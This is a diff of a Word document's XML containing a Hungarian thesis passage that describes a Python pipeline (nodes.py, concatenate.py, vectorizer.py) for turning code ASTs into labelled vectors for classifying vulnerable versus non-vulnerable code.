-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dataset </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">1.oszlopának bináris számain is, amiket pedig az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">y </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>változóba tesz.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="1134"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -17226,10 +15353,10 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF0CC3C" wp14:editId="4CD7F8BB">
-            <wp:extent cx="3784795" cy="1892397"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-            <wp:docPr id="23" name="Kép 23"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67F1A32B" wp14:editId="3C0D88AE">
+            <wp:extent cx="3791145" cy="1847945"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="10" name="Kép 10"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -17249,6 +15376,1765 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="3791145" cy="1847945"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-es </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ábra: pdo1_ast.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3.1-es ábra kódjának AST megfelelője</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nodes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.py </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ezekkel dolgozik tovább</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Elsőként listázza és egy ciklussal sorra </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">beolvassa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST mappa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> .txt kiterjesztésű fájljait</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>. M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ajd </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ezek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>JSON felépítésű fájlok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nak a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sorait kulcsok alapján szelektálja</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> („kind”, „name”, „raw”)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ezek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z értéke</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>adják a fájlok fontos szavait és kifejezéseit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, így </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>azonos nevű .csv kiterjesztésű fájlok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> első oszlop</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>aiba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> írja</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>az értékeket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>listá</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ba fűzve.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Az oszlopokat ’^’ karakter választja el.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D80A38E" wp14:editId="1B0F2926">
+            <wp:extent cx="5156465" cy="495325"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="15" name="Kép 15"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5156465" cy="495325"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-as ábra: pdo1_ast.csv, a nodes.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kimenete, a 3.2-es ábra bemenetre</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> következő lépésben a .csv fájlokat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>fűzi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> össze</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>concatenate.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>concatenated.csv fájlb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a. E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>zen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a pont</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">manuálisan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>felcímkéz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>em őket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nnak duplikáltjában, a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> concatenated_titled.csv</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-ben</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A duplikálás oka, miszerint minden egyes újrafuttatásakor a concatenate.py újraírja a concatenated.csv-t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ezáltal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ha a manuális változtatások nem kerülnének át más fájlba, akkor elvesznének</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az összefűzés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egyszerű oka</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pedig</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az összes </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv viszonylatában</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> csak a saját</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>jában.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Így a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vectorizer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.py </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>már a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>összefűzött</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és felcí</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kézett </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>concatenated</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>_titled</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.csv-t dolgozza fel.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A fájl legfőbb feladata</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, hogy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> olyan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>numpy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>okat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hoz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>zon</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> létre, ami</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> később az osztályozásért felelős fájl használni</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tud.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Kifejtve a főbb metódusait:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>__init__</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Vectorizer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> osztály konstruktora</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ami </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">paraméterként </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kér egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>fájl nevet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>filename</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">annak a felső határát, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egy sorban </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hány szó fordul elő </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>max_vocab</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a felső határát, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hány szó van </w:t>
